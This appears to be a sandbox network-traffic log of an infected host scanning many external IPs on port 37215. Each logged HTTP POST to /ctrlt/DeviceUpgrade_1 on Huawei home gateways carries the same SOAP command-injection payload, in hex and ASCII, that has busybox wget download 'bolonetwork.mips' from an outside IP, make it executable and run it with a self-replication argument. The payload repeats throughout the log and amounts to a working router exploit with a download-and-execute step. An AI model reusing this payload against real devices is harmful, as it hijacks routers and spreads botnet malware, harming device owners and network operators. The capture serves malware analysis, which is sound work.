                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.524007082 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    125192.168.2.145658873.111.130.13437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.205832005 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.524007082 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    126192.168.2.144393490.7.62.5037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.220716000 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.606817007 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    127192.168.2.1451444197.88.81.22537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.220716000 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.606817007 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    128192.168.2.1449426197.99.215.3237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.486385107 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    129192.168.2.1435154111.12.69.25537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.491652966 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    130192.168.2.144087041.122.12.15037215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.494095087 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    131192.168.2.1456838197.227.245.23637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.494095087 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
